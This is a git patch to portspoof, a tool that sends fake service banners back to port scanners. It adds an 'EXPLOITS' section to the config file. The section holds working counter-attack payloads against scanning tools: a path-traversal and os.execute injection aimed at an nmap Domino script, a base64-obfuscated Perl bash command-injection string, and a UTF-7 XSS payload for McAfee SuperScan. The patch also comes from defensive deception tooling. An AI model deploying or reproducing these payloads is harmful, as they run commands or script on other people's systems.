From 600287f90f0dddf8ab06c5cc13ad42f43b192547 Mon Sep 17 00:00:00 2001
From: Piotr Duszynski <pduszynski@FLE-CO-3PDV35.local>
Date: Thu, 1 Aug 2013 22:02:20 +0200
Subject: [PATCH] Fixed buffer len for recv

---
 src/connection.cpp   |  5 ++---
 tools/portspoof.conf | 28 +++++++++++++++++++---------
 2 files changed, 21 insertions(+), 12 deletions(-)

diff --git a/src/connection.cpp b/src/connection.cpp
index a1346c2..0e60599 100755
--- a/src/connection.cpp
+++ b/src/connection.cpp
@@ -69,7 +69,7 @@ void* process_connection(void *arg)
 	int tid =  *((int*)(&arg));
 	//int len;  
 	string str;
-	char buffer;
+	char buffer[1000];//TODO: to be fixed
 	int original_port=DEFAULT_PORT;
 	int n = 0;
 	time_t timestamp;
@@ -79,7 +79,6 @@ void* process_connection(void *arg)
 	
 	while(1) {
 
-		sleep(1);
 		for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++)
 		{
 				
@@ -91,7 +90,7 @@ void* process_connection(void *arg)
 				if(configuration->getConfigValue(OPT_NOT_NMAP_SCANNER))
 					n = 1; // just reply...
 				else
-					n = recv(threads[tid].clients[i], &buffer,1, 0);	
+					n = recv(threads[tid].clients[i], buffer,1, 0);	
 			 		
 			
 				// deal with different recv buffer size
diff --git a/tools/portspoof.conf b/tools/portspoof.conf
index e079efc..05d315d 100755
--- a/tools/portspoof.conf
+++ b/tools/portspoof.conf
@@ -75,23 +75,33 @@
 
 #Example: port range
 
-#51-60 "550 4m2v4 (FUZZ_HERE)"
+51-60 "550 4m2v4 (FUZZ_HERE)"
 
 #Example: Simple regular expression payloads
 
-#8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n"
-#8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n"
-#8082 "word: ... \. \d \w \n"
+8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n"
+8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n"
+8082 "word: ... \. \d \w \n"
 
 #Nmap regular expression matched payloads
 
-#8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n"
-#8101 "220 FUZZ_HERE SMTP ready to roll\r\n"
-#8102 "550 12345 FUZZ_HERE"
-#8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n"
-#8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\n<title>Log In - Juniper Web Device Manager</title><address>Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80</address>"
+8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n"
+8101 "220 FUZZ_HERE SMTP ready to roll\r\n"
+8102 "550 12345 FUZZ_HERE"
+8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n"
+8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\n<title>Log In - Juniper Web Device Manager</title><address>Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80</address>"
 
 ## EXPLOITS ##
 
+# NMAP 
+# nmap --script http-domino-enum-passwords.nse -p 80 172.16.37.145  -sC -PN -n --script-args domino-enum-passwords.username='xxx',domino-enum-passwords.password='secr',domino-enum-passwords.idpath='/tmp/'  -d4
+
+80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--<html>\r\n--<body><a href=\x22user-UserID\x22>\r\n--<input name=\x22HTTPPassword\x22  value=\x22PPASSS\x22>\r\n--<input name=\x22FullName\x22 value=\x22\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2fusr\x2flocal\x2fshare\x2fnmap\x2fscripts\x2fhttp-domino-enum-passwords\x2ense\x00\x61\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x25\x64\x0d\x0a--\x22>\r\n\r\n--<a href=\x22\%?OpenDocumentddddd\x22>\r\n--<form action=\x22aaa?ReadForm&\x22>\r\n--</body>\r\n--</html>\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a"	
+
 #OS cmd injection payload for bash: $(cat output) and `cat output` injections
 8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;"
+
+#McAffe SuperScan UTF7 XSS payload
+1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-"
+
+